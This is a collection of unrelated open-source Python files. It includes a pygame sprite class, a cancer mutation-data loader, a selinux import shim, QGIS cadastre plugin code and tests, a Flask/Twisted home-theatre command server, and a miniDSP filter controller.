self.rect.y = gs.SCREEN_HEIGHT - self.height - gs.SCREEN_BORDER
def collide_with_tiles(self):
"""Check if the user is colliding with any of the sprites loaded in the
collision tiles group.
"""
for tile in self.game.collision_tile_group:
if pygame.sprite.collide_rect(self, tile):
return True
return False
def pass_to_other_room(self):
for tile in self.game.trespassing_tile_group:
if pygame.sprite.collide_rect(self, tile):
return True
return False
def get_item(self, item):
self.inventory.append(item)
def update(self):
"""Handles user movement. """
key = pygame.key.get_pressed()
if key[pygame.K_RIGHT]:
self.__increment_walk_right_index()
self.set_walking_right_image()
self.rect.x += self.speed
if self.collide_with_tiles():
self.rect.x -= self.speed
if key[pygame.K_LEFT]:
self.__increment_walk_left_index()
self.set_walking_left_image()
self.rect.x -= self.speed
if self.collide_with_tiles():
self.rect.x += self.speed+2
if key[pygame.K_UP]:
self.__increment_walk_up_index()
self.set_walking_up_image()
self.rect.y -= self.speed
if self.collide_with_tiles():
self.rect.y += self.speed
if key[pygame.K_DOWN]:
self.__increment_walk_down_index()
self.set_walking_down_image()
self.rect.y += self.speed
if self.collide_with_tiles():
self.rect.y -= self.speed
if 1 not in key:
self.set_idle_image()
def save_info(self):
pass
``` |
{
"source": "3lectrologos/comet",
"score": 3
} |
#### File: comet/comet/mutation_data.py
```python
def load_mutation_data(filename, patientFile=None, geneFile=None, minFreq=0, subtypeFile=None):
"""Loads the mutation data in the given file.
:type filename: string
:param filename: Location of mutation data file.
:type patient_file: string
:param patient_file: Location of patient (whitelist) file.
:type gene_file: string
:param gene_file: Location of gene (whitelist) file.
:rtype: Tuple
**Returns:**
* **m** (*int*) - number of patients.
* **n** (*int*) - number of genes.
* **genes** (*list*) - genes in the mutation data.
* **patients** (*list*) - patients in the mutation data.
* **geneToCases** (*dictionary*) - mapping of genes to the patients in which they are mutated.
* **patientToGenes** (*dictionary*) - mapping of patients to the genes they have mutated.
* **subtypes** (*list*) - list of unique subtypes.
"""
# Load the patient whitelist (if applicable)
if patientFile:
with open(patientFile) as f:
patients = set( l.rstrip().split()[0] for l in f if not l.startswith("#") )
else:
patients = None
# Load the subtype information (if applicable)
from collections import defaultdict
subtypeDict = defaultdict( lambda: None, dict() )
subtypes = set()
if subtypeFile:
subtypeDict = defaultdict( lambda: None, dict() )
subtypes = set()
with open( subtypeFile ) as f:
sts = [ l.rstrip().split( '\t' ) for l in f if not l.startswith( '#' ) ]
for p, s in sts:
subtypeDict[p] = s
subtypes.add( s )
# Load the gene whitelist (if applicable)
if geneFile:
with open(geneFile) as f:
genes = set( l.rstrip().split()[0] for l in f if not l.startswith("#") )
genes |= subtypes
else:
genes = set()
# Parse the mutation matrix
geneToCases, patientToGenes = defaultdict(set), defaultdict(set)
with open(filename) as f:
arrs = [ l.rstrip().split("\t") for l in f if not l.startswith("#") ]
for arr in arrs:
patient, mutations = arr[0], set(arr[1:])
if subtypeDict[patient]:
mutations |= set( s for s in subtypes if subtypeDict[patient] != s )
if not patients or patient in patients:
if genes: mutations &= genes
patientToGenes[patient] = mutations
for gene in mutations:
geneToCases[gene].add(patient)
    genes = list(geneToCases.keys())
# Remove genes with fewer than min_freq mutations
toRemove = [ g for g in genes if len(geneToCases[g]) < minFreq ]
for g in toRemove:
for p in geneToCases[g]:
patientToGenes[p].remove(g)
del geneToCases[g]
genes.remove(g)
# Format and return output
genes, patients = list(geneToCases.keys()), list(patientToGenes.keys())
m, n = len(genes), len(patients)
return m, n, genes, patients, geneToCases, patientToGenes, subtypes
def adj_dict_to_lists(xs, ys, d):
"""Convert a dictionary of x -> y to a list of lists, where
each x corresponds to a list of indices of y."""
M = []
for x, y_list in d.items():
M.append( [ list(ys).index(y) for y in y_list ] )
return M
def convert_mutations_to_C_format(m, n, genes, patients, geneToCases, patientToGenes, subtypes=None):
"""We convert the dictionaries to list of lists so they're easier to parse in C."""
if subtypes:
newg = set(genes).difference(set(subtypes))
genes = list(newg)
for s in subtypes:
genes.append(s)
#genes += subtypes
geneToIndex = dict(zip(genes, range(m)))
indexToGene = dict(zip(range(m), genes))
iPatientToGenes = adj_dict_to_lists(patients, genes, patientToGenes)
iGeneToCases = adj_dict_to_lists(genes, patients, geneToCases)
geneToNumCases = [ len(geneToCases[g]) for g in genes ]
return iPatientToGenes, iGeneToCases, geneToNumCases, geneToIndex, indexToGene
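# Hedged usage sketch (assumption: a tab-separated file where each row is
# "<patient>\t<gene1>\t<gene2>..."; the filename is hypothetical):
#
#   m, n, genes, patients, g2c, p2g, subtypes = load_mutation_data('muts.tsv')
#   args = convert_mutations_to_C_format(m, n, genes, patients, g2c, p2g)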
``` |
{
"source": "3lixy/selinux",
"score": 2
} |
#### File: selinux/selinux/__init__.py
```python
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.1.5'
import json
import os
import platform
import subprocess
import sys
try:
from imp import reload
except ImportError: # py34+
from importlib import reload
class add_path(object):
"""Context manager for adding path to sys.path"""
def __init__(self, path):
self.path = path
def __enter__(self):
sys.path.insert(0, self.path)
def __exit__(self, exc_type, exc_value, traceback):
try:
sys.path.remove(self.path)
except ValueError:
pass
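# Hedged usage sketch: temporarily expose a directory on sys.path.
#
#   with add_path('/usr/lib/python3/dist-packages'):
#       import some_system_module  # resolved from the added path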
def is_selinux_enabled():
return 0
def is_selinux_mls_enabled():
return 0
# selinux python library should be loaded only on selinux systems
if platform.system() == 'Linux' and os.path.isfile('/etc/selinux/config'):
def add_location(location):
"""Try to add a possble location for the selinux module"""
if os.path.isdir(os.path.join(location, 'selinux')):
with add_path(location):
# And now we replace ourselves with the original selinux module
reload(sys.modules['selinux'])
# Validate that we can perform libselinux calls
if sys.modules['selinux'].is_selinux_enabled() not in [0, 1]:
raise RuntimeError("is_selinux_enabled returned error.")
return True
return False
def get_system_sitepackages():
"""Get sitepackage locations from sytem python"""
system_python = "/usr/bin/python%s" % \
platform.python_version_tuple()[0]
fnull = open(os.devnull, 'w')
try:
system_sitepackages = json.loads(
subprocess.check_output([
system_python, "-c",
"import json, site; print(json.dumps(site.getsitepackages()))"
], stderr=fnull # no need to print error as it will confuse users
).decode("utf-8")
)
except subprocess.CalledProcessError:
# Centos/RHEL 6 python2 does not seem to have site.getsitepackages
system_python_info = json.loads(
subprocess.check_output([
system_python, "-c",
"import json, sys; print(json.dumps([sys.prefix, sys.exec_prefix, sys.version_info[:2],"
" sys.platform]))"
]
).decode("utf-8")
)
system_prefixes = [
system_python_info[0],
system_python_info[1]
]
system_version_info = system_python_info[2]
# system_platform = system_python_info[3] # this was used in a couple of getsitepackages versions
system_sitepackages = getsitepackages(system_prefixes, tuple(system_version_info))
fnull.close()
return system_sitepackages
# Taken directly from python github https://github.com/python/cpython/blob/master/Lib/site.py
def getsitepackages(prefixes, system_version_info):
"""Returns a list containing all global site-packages directories.
For each directory present in ``prefixes`` (or the global ``PREFIXES``),
this function will find its `site-packages` subdirectory depending on the
system environment, and will return a list of full paths.
"""
sitepackages = []
for lib_type in ['lib', 'lib64']: # centos/rhel also use lib64
seen = set()
for prefix in prefixes:
if not prefix or prefix in seen:
continue
seen.add(prefix)
if os.sep == '/':
sitepackages.append(os.path.join(prefix, lib_type,
"python%d.%d" % system_version_info,
"site-packages"))
else:
sitepackages.append(prefix)
sitepackages.append(os.path.join(prefix, "lib", "site-packages"))
return sitepackages
def check_system_sitepackages():
"""Try add selinux module from any of the python site-packages"""
success = False
system_sitepackages = get_system_sitepackages()
for candidate in system_sitepackages:
success = add_location(candidate)
if success:
break
if not success:
raise Exception("Failed to detect selinux python bindings at %s. Is libselinux-python installed?" %
system_sitepackages)
check_system_sitepackages()
``` |
{
"source": "3liz/QgisCadastrePlugin",
"score": 2
} |
#### File: cadastre/server/tools.py
```python
__email__ = '<EMAIL>'
import configparser
from pathlib import Path
from qgis.core import Qgis, QgsMessageLog
def version() -> str:
""" Returns the plugin current version. """
file_path = Path(__file__).parent.parent.joinpath('metadata.txt')
config = configparser.ConfigParser()
try:
config.read(file_path, encoding='utf8')
except UnicodeDecodeError:
# Issue LWC https://github.com/3liz/lizmap-web-client/issues/1908
# Maybe a locale issue ?
# Do not use logger here, circular import
# noinspection PyTypeChecker
QgsMessageLog.logMessage(
"Error, an UnicodeDecodeError occurred while reading the metadata.txt. Is the locale "
"correctly set on the server ?",
"cadastre", Qgis.Critical)
return 'NULL'
else:
return config["general"]["version"]
```
#### File: cadastre/tests/test_import_data.py
```python
import unittest
import psycopg2
from qgis.core import QgsCoordinateReferenceSystem, QgsProviderRegistry
from qgis.utils import iface
from cadastre.dialogs.import_dialog import CadastreImportDialog
from cadastre.tools import plugin_test_data_path
class TestImportData(unittest.TestCase):
def test_import(self):
"""Test to import data into a PostgreSQL database. """
# Not the best test, it's using the UI QDialog and iface
dialog = CadastreImportDialog(iface)
schema = "cadastre"
# Set postgis
dialog.liDbType.setCurrentIndex(1)
# Let the default connexion
self.assertEqual(dialog.liDbConnection.count(), 1)
# Check empty database before
metadata = QgsProviderRegistry.instance().providerMetadata("postgres")
connection = metadata.findConnection("test_database")
if schema in connection.schemas():
connection.dropSchema(schema, True)
self.assertNotIn(schema, connection.schemas())
# Create schema
dialog.inDbCreateSchema.setText(schema)
dialog.btDbCreateSchema.click()
# Check the schema exists
self.assertIn(schema, connection.schemas())
# Set the path for edigeo
dialog.inEdigeoSourceDir.setText(str(plugin_test_data_path('edigeo', '13029')))
# Set CRS
crs = QgsCoordinateReferenceSystem("EPSG:2154")
dialog.inEdigeoSourceProj.setCrs(crs)
dialog.inEdigeoTargetProj.setCrs(crs)
# Set MAJIC
dialog.inMajicSourceDir.setText(str(plugin_test_data_path('majic', '13029')))
# Set lot
dialog.inEdigeoLot.setText('1')
# Set departement
dialog.inEdigeoDepartement.setText('13')
# Set direction
dialog.inEdigeoDirection.setValue(2)
# Version
dialog.inDataVersion.setValue(2019)
# Year
dialog.inDataYear.setValue(2019)
# Import
dialog.btProcessImport.click()
# Check we have a town in edigeo
results = connection.executeSql('SELECT "geo_commune", "tex2" FROM cadastre.geo_commune;')
self.assertEqual(1, len(results))
row = results[0]
self.assertEqual("132029", row[0])
self.assertEqual("CORNILLON-CONFOUX", row[1])
# Check we have a town in majic
results = connection.executeSql('SELECT * FROM cadastre.commune_majic;')
self.assertEqual(1, len(results))
row = results[0]
self.assertEqual("132029", row[0]) # commune
self.assertEqual("2019", row[1]) # annee
self.assertEqual("13", row[2]) # ccodep
self.assertEqual("2", row[3]) # ccodir
self.assertEqual("029", row[4]) # ccocom
self.assertEqual("CORNILLON-CONFOUX", row[5]) # libcom
self.assertEqual("1", row[6]) # lot
``` |
{
"source": "3ll3d00d/cmdserver",
"score": 2
} |
#### File: cmdserver/src/cmdserver.py
```python
import faulthandler
import os
from os import path
from autobahn.twisted.resource import WebSocketResource
from flask import Flask
from flask_restx import Api
from pj import PJ, UpdatePJ, Info
from pjcontroller import PJController
from command import Commands, Command
from commandcontroller import CommandController
from config import Config
from playingnow import PlayingNow, InfoProvider
from tivo import Tivos, Tivo
from tivocontroller import TivoController
from ws import WsServer
API_PREFIX = '/api/1'
faulthandler.enable()
if hasattr(faulthandler, 'register'):
import signal
faulthandler.register(signal.SIGUSR2, all_threads=True)
app = Flask(__name__)
api = Api(app)
cfg = Config('cmdserver')
ws_server = WsServer()
info_provider = InfoProvider(cfg, ws_server)
resource_args = {
'command_controller': CommandController(cfg),
'tivoController': TivoController(),
'pj_controller': PJController(cfg),
'info_provider': info_provider,
'config': cfg
}
# GET: gets the available commands
api.add_resource(Commands, API_PREFIX + '/commands', resource_class_kwargs=resource_args)
# PUT: executes a command
api.add_resource(Command, API_PREFIX + '/commands/<command>', resource_class_kwargs=resource_args)
# GET: gets the current state of the playback system
api.add_resource(PlayingNow, API_PREFIX + '/playingnow', resource_class_kwargs=resource_args)
# GET: available TIVOs
# POST: send a command
api.add_resource(Tivos, API_PREFIX + '/tivos', resource_class_kwargs=resource_args)
# GET: get from tivo
api.add_resource(Tivo, API_PREFIX + '/tivo/<tivo>', resource_class_kwargs=resource_args)
# GET: get info
api.add_resource(Info, API_PREFIX + '/info', resource_class_kwargs=resource_args)
# GET: read only command
api.add_resource(PJ, API_PREFIX + '/pj/<command>', resource_class_kwargs=resource_args)
# PUT: write command
api.add_resource(UpdatePJ, API_PREFIX + '/pj', resource_class_kwargs=resource_args)
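# Hedged usage sketch (host, port and command name are assumptions, not taken
# from this file):
#   GET  http://localhost:<port>/api/1/commands        -> list the available commands
#   PUT  http://localhost:<port>/api/1/commands/lights -> execute the hypothetical 'lights' command
#   GET  http://localhost:<port>/api/1/playingnow      -> current playback state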
def main(args=None):
""" The main routine. """
logger = cfg.configure_logger()
if cfg.useTwisted:
import logging
logger = logging.getLogger('twisted')
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web import static, server
from twisted.web.wsgi import WSGIResource
from twisted.application import service
from twisted.internet import endpoints
class ReactApp:
"""
Handles the react app (excluding the static dir).
"""
def __init__(self, path):
# TODO allow this to load when in debug mode even if the files don't exist
self.publicFiles = {f: static.File(os.path.join(path, f)) for f in os.listdir(path) if
os.path.exists(os.path.join(path, f))}
self.indexHtml = ReactIndex(os.path.join(path, 'index.html'))
def get_file(self, path):
"""
overrides getChild so it always just serves index.html unless the file does actually exist (i.e. is an
icon or something like that)
"""
return self.publicFiles.get(path.decode('utf-8'), self.indexHtml)
class ReactIndex(static.File):
"""
a twisted File which overrides getChild so it always just serves index.html (NB: this is a bit of a hack,
there is probably a more correct way to do this but...)
"""
def getChild(self, path, request):
return self
class FlaskAppWrapper(Resource):
"""
            wraps the flask app as a WSGI resource while allowing the react index.html (and its associated
            static content) to be served as the default page.
"""
def __init__(self):
super().__init__()
self.wsgi = WSGIResource(reactor, reactor.getThreadPool(), app)
import sys
if getattr(sys, 'frozen', False):
# pyinstaller lets you copy files to arbitrary locations under the _MEIPASS root dir
uiRoot = os.path.join(sys._MEIPASS, 'ui')
elif cfg.webappPath is not None:
uiRoot = cfg.webappPath
else:
# release script moves the ui under the analyser package because setuptools doesn't seem to include
# files from outside the package
uiRoot = os.path.join(os.path.dirname(__file__), 'ui')
logger.info('Serving ui from ' + str(uiRoot))
self.react = ReactApp(uiRoot)
self.static = static.File(os.path.join(uiRoot, 'static'))
self.icons = static.File(cfg.iconPath)
ws_server.factory.startFactory()
self.ws_resource = WebSocketResource(ws_server.factory)
def getChild(self, path, request):
"""
Overrides getChild to allow the request to be routed to the wsgi app (i.e. flask for the rest api
calls), the static dir (i.e. for the packaged css/js etc), the various concrete files (i.e. the public
dir from react-app), the command icons or to index.html (i.e. the react app) for everything else.
:param path:
:param request:
:return:
"""
# allow CORS (CROSS-ORIGIN RESOURCE SHARING) for debug purposes
request.setHeader('Access-Control-Allow-Origin', '*')
request.setHeader('Access-Control-Allow-Methods', 'GET, PUT')
request.setHeader('Access-Control-Allow-Headers', 'x-prototype-version,x-requested-with')
request.setHeader('Access-Control-Max-Age', '2520') # 42 hours
logger.debug(f"Handling {path}")
if path == b'ws':
return self.ws_resource
elif path == b'api':
request.prepath.pop()
request.postpath.insert(0, path)
return self.wsgi
elif path == b'static':
return self.static
elif path == b'icons':
return self.icons
else:
return self.react.get_file(path)
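            # Hedged routing sketch (request paths are illustrative):
            #   /ws              -> the websocket resource
            #   /api/1/commands  -> the flask app via WSGI
            #   /static/main.js  -> packaged css/js
            #   /icons/tv.png    -> command icons
            #   anything else    -> index.html or a concrete file from the react public dir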
def render(self, request):
return self.wsgi.render(request)
application = service.Application('cmdserver')
if cfg.is_access_logging is True:
site = server.Site(FlaskAppWrapper(), logPath=path.join(cfg.config_path, 'access.log').encode())
else:
site = server.Site(FlaskAppWrapper())
endpoint = endpoints.TCP4ServerEndpoint(reactor, cfg.port, interface='0.0.0.0')
endpoint.listen(site)
reactor.run()
else:
logger.error('Icons are not available in debug mode')
# get config from a flask standard place not our config yml
app.run(debug=cfg.run_in_debug, host='0.0.0.0', port=cfg.port, use_reloader=False)
if __name__ == '__main__':
main()
``` |
{
"source": "3ll3d00d/ezbeq",
"score": 2
} |
#### File: ezbeq/ezbeq/minidsp.py
```python
import json
import logging
import os
from concurrent.futures.thread import ThreadPoolExecutor
from contextlib import contextmanager
from typing import List, Optional, Union
import math
import time
from autobahn.exception import Disconnected
from autobahn.twisted import WebSocketClientFactory, WebSocketClientProtocol
from twisted.internet.protocol import ReconnectingClientFactory
from ezbeq.apis.ws import WsServer
from ezbeq.catalogue import CatalogueEntry, CatalogueProvider
from ezbeq.device import InvalidRequestError, SlotState, PersistentDevice, DeviceState
logger = logging.getLogger('ezbeq.minidsp')
class MinidspState(DeviceState):
def __init__(self, name: str, **kwargs):
self.__name = name
self.master_volume: float = kwargs['mv'] if 'mv' in kwargs else 0.0
self.__mute: bool = kwargs['mute'] if 'mute' in kwargs else False
self.__active_slot: str = kwargs['active_slot'] if 'active_slot' in kwargs else ''
slot_ids = [str(i + 1) for i in range(4)]
self.__slots: List[MinidspSlotState] = [MinidspSlotState(c_id, c_id == self.active_slot) for c_id in slot_ids]
def update_master_state(self, mute: bool, gain: float):
self.__mute = mute
self.master_volume = gain
def activate(self, slot_id: str):
self.__active_slot = slot_id
for s in self.__slots:
s.active = s.slot_id == slot_id
@property
def active_slot(self) -> str:
return self.__active_slot
@property
def mute(self) -> bool:
return self.__mute
def load(self, slot_id: str, title: str):
self.get_slot(slot_id).last = title
self.activate(slot_id)
def get_slot(self, slot_id) -> 'MinidspSlotState':
return next(s for s in self.__slots if s.slot_id == slot_id)
def clear(self, slot_id):
slot = self.get_slot(slot_id)
slot.unmute(None)
slot.set_gain(None, 0.0)
slot.last = 'Empty'
self.activate(slot_id)
def error(self, slot_id):
self.get_slot(slot_id).last = 'ERROR'
self.activate(slot_id)
def gain(self, slot_id: Optional[str], channel: Optional[int], gain: float):
if slot_id is None:
self.master_volume = gain
else:
self.get_slot(slot_id).set_gain(channel, gain)
self.activate(slot_id)
def toggle_mute(self, slot_id: Optional[str], channel: Optional[int], mute: bool):
if slot_id is None:
self.__mute = mute
else:
slot = self.get_slot(slot_id)
if mute:
slot.mute(channel)
else:
slot.unmute(channel)
self.activate(slot_id)
def serialise(self) -> dict:
return {
'name': self.__name,
'masterVolume': self.master_volume,
'mute': self.__mute,
'slots': [s.as_dict() for s in self.__slots]
}
def merge_with(self, cached: dict) -> None:
saved_slots_by_id = {v['id']: v for v in cached.get('slots', [])}
current_slots_by_id = {s.slot_id: s for s in self.__slots}
if saved_slots_by_id.keys() == current_slots_by_id.keys():
for slot_id, state in saved_slots_by_id.items():
current_slots_by_id[slot_id].merge_with(state)
class MinidspSlotState(SlotState['MinidspSlotState']):
def __init__(self, slot_id: str, active: bool):
super().__init__(slot_id)
self.gain1 = 0.0
self.mute1 = False
self.gain2 = 0.0
self.mute2 = False
self.active = active
def clear(self):
super().clear()
self.gain1 = 0.0
self.gain2 = 0.0
self.mute1 = False
self.mute2 = False
def set_gain(self, channel: Optional[int], value: float):
if channel is None:
self.gain1 = value
self.gain2 = value
else:
if channel == 1:
self.gain1 = value
elif channel == 2:
self.gain2 = value
else:
raise ValueError(f'Unknown channel {channel} for slot {self.slot_id}')
def mute(self, channel: Optional[int]):
self.__do_mute(channel, True)
def __do_mute(self, channel: Optional[int], value: bool):
if channel is None:
self.mute1 = value
self.mute2 = value
else:
if channel == 1:
self.mute1 = value
elif channel == 2:
self.mute2 = value
else:
raise ValueError(f'Unknown channel {channel} for slot {self.slot_id}')
def unmute(self, channel: Optional[int]):
self.__do_mute(channel, False)
def merge_with(self, state: dict) -> None:
super().merge_with(state)
if 'gain1' in state:
self.gain1 = float(state['gain1'])
if 'gain2' in state:
self.gain2 = float(state['gain2'])
if 'mute1' in state:
self.mute1 = bool(state['mute1'])
if 'mute2' in state:
self.mute2 = bool(state['mute2'])
def as_dict(self) -> dict:
sup = super().as_dict()
return {
**sup,
'gain1': self.gain1,
'gain2': self.gain2,
'mute1': self.mute1,
'mute2': self.mute2,
'canActivate': True
}
def __repr__(self):
return f"{super().__repr__()} - 1: {self.gain1:.2f}/{self.mute1} 2: {self.gain2:.2f}/{self.mute2}"
class Minidsp(PersistentDevice[MinidspState]):
def __init__(self, name: str, config_path: str, cfg: dict, ws_server: WsServer, catalogue: CatalogueProvider):
super().__init__(config_path, name, ws_server)
self.__catalogue = catalogue
self.__executor = ThreadPoolExecutor(max_workers=1)
self.__cmd_timeout = cfg.get('cmdTimeout', 10)
self.__ignore_retcode = cfg.get('ignoreRetcode', False)
self.__levels_interval = 1.0 / float(cfg.get('levelsFps', 10))
self.__runner = cfg['make_runner']()
self.__client = MinidspRsClient(self) if cfg.get('useWs', False) else None
ws_server.factory.set_levels_provider(name, self.start_broadcast_levels)
@property
def device_type(self) -> str:
return self.__class__.__name__.lower()
@property
def supports_gain(self) -> bool:
return True
def __load_state(self) -> MinidspState:
result = self.__executor.submit(self.__read_state_from_device).result(timeout=self.__cmd_timeout)
return result if result else MinidspState(self.name)
def __read_state_from_device(self) -> Optional[MinidspState]:
output = None
try:
kwargs = {'retcode': None} if self.__ignore_retcode else {}
output = self.__runner['-o', 'jsonline'](timeout=self.__cmd_timeout, **kwargs)
lines = output.splitlines()
if lines:
status = json.loads(lines[0])
values = {
'active_slot': str(status['master']['preset'] + 1),
'mute': status['master']['mute'],
'mv': status['master']['volume']
}
return MinidspState(self.name, **values)
else:
logger.error(f"No output returned from device")
except:
logger.exception(f"Unable to parse device state {output}")
return None
@staticmethod
def __as_idx(idx: Union[int, str]):
return int(idx) - 1
def __send_cmds(self, target_slot_idx: Optional[int], cmds: List[str]):
return self.__executor.submit(self.__do_run, cmds, target_slot_idx).result(timeout=self.__cmd_timeout)
def activate(self, slot: str):
def __do_it():
target_slot_idx = self.__as_idx(slot)
self.__validate_slot_idx(target_slot_idx)
self.__send_cmds(target_slot_idx, [])
self._current_state.activate(slot)
self._hydrate_cache_broadcast(__do_it)
@staticmethod
def __validate_slot_idx(target_slot_idx):
if target_slot_idx < 0 or target_slot_idx > 3:
raise InvalidRequestError(f"Slot must be in range 1-4")
def load_biquads(self, slot: str, overwrite: bool, inputs: List[int], outputs: List[int], biquads: List[dict]) -> None:
def __do_it():
target_slot_idx = self.__as_idx(slot)
self.__validate_slot_idx(target_slot_idx)
cmds = MinidspBeqCommandGenerator.biquads(overwrite, inputs, outputs, biquads)
try:
self.__send_cmds(target_slot_idx, cmds)
if inputs:
self._current_state.load(slot, 'CUSTOM')
else:
self._current_state.activate(slot)
except Exception as e:
self._current_state.error(slot)
raise e
self._hydrate_cache_broadcast(__do_it)
def load_filter(self, slot: str, entry: CatalogueEntry) -> None:
def __do_it():
target_slot_idx = self.__as_idx(slot)
self.__validate_slot_idx(target_slot_idx)
cmds = MinidspBeqCommandGenerator.filt(entry)
try:
self.__send_cmds(target_slot_idx, cmds)
self._current_state.load(slot, entry.formatted_title)
except Exception as e:
self._current_state.error(slot)
raise e
self._hydrate_cache_broadcast(__do_it)
def clear_filter(self, slot: str) -> None:
def __do_it():
target_slot_idx = self.__as_idx(slot)
self.__validate_slot_idx(target_slot_idx)
cmds = MinidspBeqCommandGenerator.filt(None)
cmds.extend(MinidspBeqCommandGenerator.mute(False, target_slot_idx, None))
cmds.extend(MinidspBeqCommandGenerator.gain(0.0, target_slot_idx, None))
try:
self.__send_cmds(target_slot_idx, cmds)
self._current_state.clear(slot)
except Exception as e:
self._current_state.error(slot)
raise e
self._hydrate_cache_broadcast(__do_it)
def mute(self, slot: Optional[str], channel: Optional[int]) -> None:
self.__do_mute_op(slot, channel, True)
def __do_mute_op(self, slot: Optional[str], channel: Optional[int], state: bool):
def __do_it():
target_channel_idx, target_slot_idx = self.__as_idxes(channel, slot)
            if target_slot_idx is not None:
self.__validate_slot_idx(target_slot_idx)
cmds = MinidspBeqCommandGenerator.mute(state, target_slot_idx, target_channel_idx)
self.__send_cmds(target_slot_idx, cmds)
self._current_state.toggle_mute(slot, channel, state)
self._hydrate_cache_broadcast(__do_it)
def unmute(self, slot: Optional[str], channel: Optional[int]) -> None:
self.__do_mute_op(slot, channel, False)
def set_gain(self, slot: Optional[str], channel: Optional[int], gain: float) -> None:
def __do_it():
target_channel_idx, target_slot_idx = self.__as_idxes(channel, slot)
cmds = MinidspBeqCommandGenerator.gain(gain, target_slot_idx, target_channel_idx)
self.__send_cmds(target_slot_idx, cmds)
self._current_state.gain(slot, channel, gain)
self._hydrate_cache_broadcast(__do_it)
def __as_idxes(self, channel, slot):
target_slot_idx = self.__as_idx(slot) if slot else None
target_channel_idx = self.__as_idx(channel) if channel else None
return target_channel_idx, target_slot_idx
def __do_run(self, config_cmds: List[str], slot: Optional[int]):
if slot is not None:
change_slot = True
current_state = self.__read_state_from_device()
if current_state and current_state.active_slot == str(slot + 1):
change_slot = False
if change_slot is True:
logger.info(f"Activating slot {slot}, current is {current_state.active_slot if current_state else 'UNKNOWN'}")
config_cmds.insert(0, MinidspBeqCommandGenerator.activate(slot))
formatted = '\n'.join(config_cmds)
logger.info(f"\n{formatted}")
with tmp_file(config_cmds) as file_name:
kwargs = {'retcode': None} if self.__ignore_retcode else {}
logger.info(
f"Sending {len(config_cmds)} commands to slot {slot} via {file_name} {kwargs if kwargs else ''}")
start = time.time()
code, stdout, stderr = self.__runner['-f', file_name].run(timeout=self.__cmd_timeout, **kwargs)
end = time.time()
logger.info(
f"Sent {len(config_cmds)} commands to slot {slot} in {to_millis(start, end)}ms - result is {code}")
def _load_initial_state(self) -> MinidspState:
return self.__load_state()
def state(self) -> MinidspState:
if not self._hydrate():
new_state = self.__load_state()
self._current_state.update_master_state(new_state.mute, new_state.master_volume)
return self._current_state
def _merge_state(self, loaded: MinidspState, cached: dict) -> MinidspState:
loaded.merge_with(cached)
return loaded
def update(self, params: dict) -> bool:
def __do_it() -> bool:
any_update = False
if 'slots' in params:
for slot in params['slots']:
any_update |= self.__update_slot(slot)
if 'mute' in params and params['mute'] != self._current_state.mute:
if self._current_state.mute:
self.unmute(None, None)
else:
self.mute(None, None)
any_update = True
if 'masterVolume' in params and not math.isclose(params['masterVolume'], self._current_state.master_volume):
self.set_gain(None, None, params['masterVolume'])
any_update = True
return any_update
return self._hydrate_cache_broadcast(__do_it)
def __update_slot(self, slot: dict) -> bool:
any_update = False
current_slot = self._current_state.get_slot(slot['id'])
if 'gain1' in slot:
self.set_gain(current_slot.slot_id, 1, slot['gain1'])
any_update = True
if 'gain2' in slot:
self.set_gain(current_slot.slot_id, 2, slot['gain2'])
any_update = True
if 'mute1' in slot:
if slot['mute1'] is True:
self.mute(current_slot.slot_id, 1)
else:
self.unmute(current_slot.slot_id, 1)
any_update = True
if 'mute2' in slot:
            if slot['mute2'] is True:
self.mute(current_slot.slot_id, 2)
else:
self.unmute(current_slot.slot_id, 2)
any_update = True
if 'entry' in slot:
if slot['entry']:
match = self.__catalogue.find(slot['entry'])
if match:
self.load_filter(current_slot.slot_id, match)
any_update = True
else:
self.clear_filter(current_slot.slot_id)
if 'active' in slot:
self.activate(current_slot.slot_id)
any_update = True
return any_update
def levels(self) -> dict:
return self.__executor.submit(self.__read_levels_from_device).result(timeout=self.__cmd_timeout)
def __read_levels_from_device(self) -> dict:
lines = None
try:
kwargs = {'retcode': None} if self.__ignore_retcode else {}
start = time.time()
lines = self.__runner['-o', 'jsonline'](timeout=self.__cmd_timeout, **kwargs)
end = time.time()
levels = json.loads(lines)
ts = time.time()
logger.info(f"readlevels,{ts},{to_millis(start, end)}")
return {
'ts': ts,
'input': levels['input_levels'],
'output': levels['output_levels']
}
except:
logger.exception(f"Unable to load levels {lines}")
return {}
def start_broadcast_levels(self) -> None:
from twisted.internet import reactor
sched = lambda: reactor.callLater(self.__levels_interval, __send)
def __send():
msg = json.dumps(self.levels())
if self.ws_server.levels(self.name, msg):
sched()
sched()
class MinidspBeqCommandGenerator:
@staticmethod
def activate(slot: int) -> str:
return f"config {slot}"
@staticmethod
def biquads(overwrite: bool, inputs: List[int], outputs: List[int], biquads: List[dict]):
# [in|out]put <channel> peq <index> set -- <b0> <b1> <b2> <a1> <a2>
# [in|out]put <channel> peq <index> bypass [on|off]
cmds = []
for side, channels in {'input': inputs, 'output': outputs}.items():
for channel in channels:
for idx, bq in enumerate(biquads):
coeffs = [bq['b0'], bq['b1'], bq['b2'], bq['a1'], bq['a2']]
cmds.append(MinidspBeqCommandGenerator.bq(channel - 1, idx, coeffs, side=side))
cmds.append(MinidspBeqCommandGenerator.bypass(channel - 1, idx, False, side=side))
if overwrite:
for idx in range(len(biquads), 10):
cmds.append(MinidspBeqCommandGenerator.bypass(channel - 1, idx, True, side=side))
return cmds
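    # Minimal sketch of the generated output (biquad values are hypothetical):
    #   biquads(False, [1], [], [{'b0': '1.0', 'b1': '0.0', 'b2': '0.0', 'a1': '0.0', 'a2': '0.0'}])
    #     -> ['input 0 peq 0 set -- 1.0 0.0 0.0 0.0 0.0',
    #         'input 0 peq 0 bypass off']
    # with overwrite=True the remaining peq indexes up to 9 are also bypassed.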
@staticmethod
def filt(entry: Optional[CatalogueEntry]):
# input <channel> peq <index> set -- <b0> <b1> <b2> <a1> <a2>
# input <channel> peq <index> bypass [on|off]
cmds = []
for c in range(2):
idx = 0
if entry:
for f in entry.filters:
bq: dict = f['biquads']['96000']
coeffs: List[str] = bq['b'] + bq['a']
if len(coeffs) != 5:
raise ValueError(f"Invalid coeff count {len(coeffs)} at idx {idx}")
else:
cmds.append(MinidspBeqCommandGenerator.bq(c, idx, coeffs))
cmds.append(MinidspBeqCommandGenerator.bypass(c, idx, False))
idx += 1
for i in range(idx, 10):
cmds.append(MinidspBeqCommandGenerator.bypass(c, i, True))
return cmds
@staticmethod
def bq(channel: int, idx: int, coeffs, side: str = 'input'):
return f"{side} {channel} peq {idx} set -- {' '.join(coeffs)}"
